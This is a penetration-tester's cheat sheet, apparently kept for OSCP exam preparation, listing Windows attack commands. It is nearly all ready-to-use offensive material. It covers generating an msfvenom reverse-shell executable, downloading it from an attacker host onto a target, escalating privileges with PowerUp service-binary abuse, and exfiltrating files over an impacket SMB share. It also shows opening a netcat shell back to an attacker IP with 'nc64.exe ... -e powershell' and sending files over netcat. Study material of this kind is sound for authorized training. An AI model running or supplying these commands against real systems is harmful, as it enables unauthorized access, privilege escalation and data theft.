# Quality of Life Cheatsheet

========================================================================================
Upgrade Windows Dumb Shell
rlwrap listener
rlwrap nc -lvp 4242

Create Stageless Windows Rev shell Payload
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER> LPORT=4242 -f exe > reverse.exe

python http server
python3 -m http.server 80

upload it
iwr -uri http://<ATTACKER>/reverse.exe -Outfile rev.exe

Move in payload
Move-Item –Path Current.exe -Destination  "C:\<PATH>"
or move <pathtopayload> <payload destination>


========================================================================================
Powerup
Upload it
iwr -uri http://<ATTACKER>/reverse.exe -Outfile rev.exe

RDP in
xfreerdp /u:admin /p:'mypassword' /v:'TARGET' /cert-ignore /w:1366 /h:768

NOTE:  must be rdp session
Get-ModifiableServiceFile
or
$ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal
$ModifiableFiles

# Attempt exploit
Install-ServiceBinary -Name 'mysql'

#Login
runas /user:john "cmd.exe"

#Elevate prompt (john may be part of admin, but if he's in a regular session he wont have permission to do stuff)
powershell -Command "Start-Process cmd -Verb RunAs"


========================================================================================
Exfiltrate data from a windows target 
https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration#smb

Windows 10 confirmed
on kali
impacket-smbserver -smb2support -user test -password test test `pwd`

on target
net use z: \\ATTACKER\test /user:test test

run winPEAS and put into shared drive
.\winPEAS.exe > z:/winpeas.txt

on attacker read winPEAS with color...
less -r winpeas.txt

move files from target to attacker
move test2.txt z:\test2.txt


cleanup on target
net use z: /delete

========================================================================================
Adding notes on how to compile from binary, this should really be second nature at this point...
wget https://github.com/itm4n/PrintSpoofer/archive/refs/tags/v1.0.tar.gz
tar -xvf example.tar
or
tar -xvf example.tar -C /path/to/destination

if its a tar.gz file add the z option
tar -xzvf your_archive.tar.gz

I have examples of code to compile in the Scripts Folder
https://github.com/Szwochm/OSCP-Prep/tree/main/Scripts

If that doesn't work check the inside the file

for visual code projects on kali you basically have to install Visual Code for Kali as far as I'm aware. 
========================================================================================
Netcat Tricks

Using nc64.exe to create a shell

Attacker
rlwrap nc -lvp 1234

Target:
nc64.exe 192.168.45.237 1234 -e powershell
Note: Stupid mistake, dont use -sh on a windows system, use -e powershell or -e cmd

Quickly send a file
Attacker
 nc -nv 192.168.207.75 4444 < PowerUp.ps1

Target
 C:\tools\.\nc64.exe -nlvp 4444 > PowerUp.ps1
